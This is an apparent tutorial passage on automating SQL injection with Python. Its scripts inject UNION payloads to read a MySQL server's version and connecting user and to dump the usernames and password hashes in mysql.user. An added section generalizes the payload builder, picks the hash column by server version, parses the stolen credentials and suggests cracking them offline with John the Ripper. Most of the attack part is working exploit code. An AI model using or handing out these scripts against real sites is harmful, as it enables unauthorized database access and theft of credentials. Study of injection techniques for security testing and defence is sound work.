Automating basic extractions

The first thing we want to obtain after we get a working SQL injection is information about the database we're working with, such as the database version, the current user, the current database, and so on.

In order to do so, we use SELECT @@version; to obtain the database version and SELECT user(); to obtain the database account the application connects with. In our example, the injection that retrieves the version is ' union SELECT 1,@@version-- -. The 1 before @@version pads the UNION so that it returns the same number of columns as the original query; a UNION only works when both sides select the same number of columns.

In our case, the original query returns two columns; that's why we add a single 1 and put @@version in the second column.

Let's go to our editor and continue with the file SQLinjector-2.py. We have added two new functions to obtain the version and the current user from the database. You will notice the following injections:

import re
import requests


def detect_user(url):
    # Inject user() into the second column of the UNION, wrapped in TOK markers
    new_url = url.replace("FUZZ", "'%20union%20SELECT%201,CONCAT('TOK',user(),'TOK')--%20-")
    req = requests.get(new_url)
    # Capture whatever the page echoed between the two markers
    reg = r"TOK(.+?)TOK"
    users = re.findall(reg, req.text)
    for user in users:
        print(user)
    return users[0] if users else None


def detect_version(url):
    # Same technique with @@version in place of user()
    new_url = url.replace("FUZZ", "'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
    req = requests.get(new_url)
    reg = r"TOK(.+?)TOK"
    version = re.findall(reg, req.text)
    for ver in version:
        print(ver)
    return version[0] if version else None

The %20 is the URL-encoded form of the space character. We use the CONCAT function to prepend and append the string TOK to the result of user(). These strings serve as tokens that mark the query output inside the HTML response.

To extract the value, we process the response with a regular expression that matches the two TOK tokens and captures the string between them. We define the regular expression, call the findall function from the re library on the response body, and iterate over the results.

In this case, there should be only one match. detect_version follows the same process to obtain the database version, using @@version instead of user().

Now, we want to obtain the MySQL usernames and password hashes. The query we need for this is SELECT user, password FROM mysql.user;. Note that the password column exists up to MySQL 5.6; on MySQL 5.7 and later the hash is stored in the authentication_string column instead.

Remember that this will only work if the account the web application uses to connect to the database has the privileges to read that table. Best practices recommend against connecting with such a privileged account, but many people still do it.

We added the function steal_users to extract this data, using the same token technique as before to identify the output in the HTML results. Let's run the script from the command line, with the same command as before, and look at the output.

Now we can see the new data that has been extracted. The database version is printed; in this case it is 5.6.28, and the Ubuntu package suffix on the version string (15.10.1) hints that the server runs Ubuntu 15.10. The database user the application connects as is root, which means that we have high privileges that will allow us to do more interesting things, such as reading the mysql.user table, where the usernames and password hashes are stored.

We can see the hashes for the users root, debian-sys-maint, and phpmyadmin. The repetitions happen because each user has several host entries in mysql.user, one row per user@host combination. These password hashes can be cracked offline with a tool like John the Ripper if you need the cleartext passwords. You now have a pretty good idea of the target, so let's continue extracting data.
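The token technique above generalizes beyond the two hard-coded payloads. The following is an added example, not code from SQLinjector-2.py: it builds the UNION payload for any column count, picks the right mysql.user hash column for the reported server version (password up to MySQL 5.6, authentication_string from 5.7; MariaDB still populates password), joins user and hash with CONCAT_WS so one token pair carries a whole row, and collapses the per-host repetitions client-side. Function names, the SAMPLE_HTML response and the placeholder hashes in it are all constructed for the example; the result of the payload builder is what you would substitute for FUZZ in the target URL.

```python
import re
import urllib.parse

TOKEN = "TOK"  # marker that brackets the query output inside the HTML


def build_union_payload(expr, column_count, position=2, token=TOKEN):
    """Return the URL-encoded UNION payload that goes in place of FUZZ.

    `expr` is wrapped in CONCAT('TOK',...,'TOK') and placed in column
    `position`; every other column is padded with an integer so the UNION
    returns exactly `column_count` columns, like the original query.
    """
    if not 1 <= position <= column_count:
        raise ValueError("position must be within 1..column_count")
    cols = [str(i) for i in range(1, column_count + 1)]
    cols[position - 1] = f"CONCAT('{token}',{expr},'{token}')"
    raw = f"' union SELECT {','.join(cols)}-- -"
    # Keep the SQL punctuation readable; spaces become %20 as in the payloads above
    return urllib.parse.quote(raw, safe="'(),@:")


def users_expression(version):
    """Pick the mysql.user column that holds the password hash for this server.

    MySQL up to 5.6 keeps it in `password`; 5.7 and later only have
    `authentication_string`. MariaDB (any version) still fills `password`.
    """
    if "mariadb" in version.lower():
        column = "password"
    else:
        major, minor = (int(x) for x in version.split(".")[:2])
        column = "password" if (major, minor) < (5, 7) else "authentication_string"
    # CONCAT_WS joins user and hash with ':' so a single column carries the row
    return f"CONCAT_WS(':',user,{column})"


def extract_tokens(html, token=TOKEN):
    """Return every string the page echoed between a pair of tokens, in page order."""
    pattern = re.escape(token) + r"(.+?)" + re.escape(token)
    return re.findall(pattern, html, re.S)


def unique_in_order(values):
    """Drop repeats (one mysql.user row per host entry) but keep first-seen order."""
    seen = set()
    out = []
    for v in values:
        if v not in seen:
            seen.add(v)
            out.append(v)
    return out


# Constructed sample of what the vulnerable page could return for the users
# payload: root appears twice because it has two host entries. The hashes are
# placeholders, not real MySQL hashes.
SAMPLE_HTML = """<html><body><table>
<tr><td>1</td><td>TOKroot:*1111111111111111111111111111111111111111TOK</td></tr>
<tr><td>1</td><td>TOKroot:*1111111111111111111111111111111111111111TOK</td></tr>
<tr><td>1</td><td>TOKdebian-sys-maint:*2222222222222222222222222222222222222222TOK</td></tr>
<tr><td>1</td><td>TOKphpmyadmin:*3333333333333333333333333333333333333333TOK</td></tr>
</table></body></html>"""


def steal_users(html):
    """Parse the users response into (user, hash) pairs, one per distinct account.

    Split on the first ':' only: a hash may contain ':' but a user name normally does not.
    """
    rows = unique_in_order(extract_tokens(html))
    return [tuple(row.split(":", 1)) for row in rows]


if __name__ == "__main__":
    version = "5.6.28-0ubuntu0.15.10.1"  # as returned by the @@version payload
    print(build_union_payload(users_expression(version), column_count=2))
    for user, pw_hash in steal_users(SAMPLE_HTML):
        print(user, pw_hash)
```

In a real run you would feed the string from build_union_payload into url.replace("FUZZ", ...) exactly as detect_user does, and pass the response body to steal_users; the server-side alternative to unique_in_order is a SELECT DISTINCT, but deduplicating client-side keeps the payload short.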
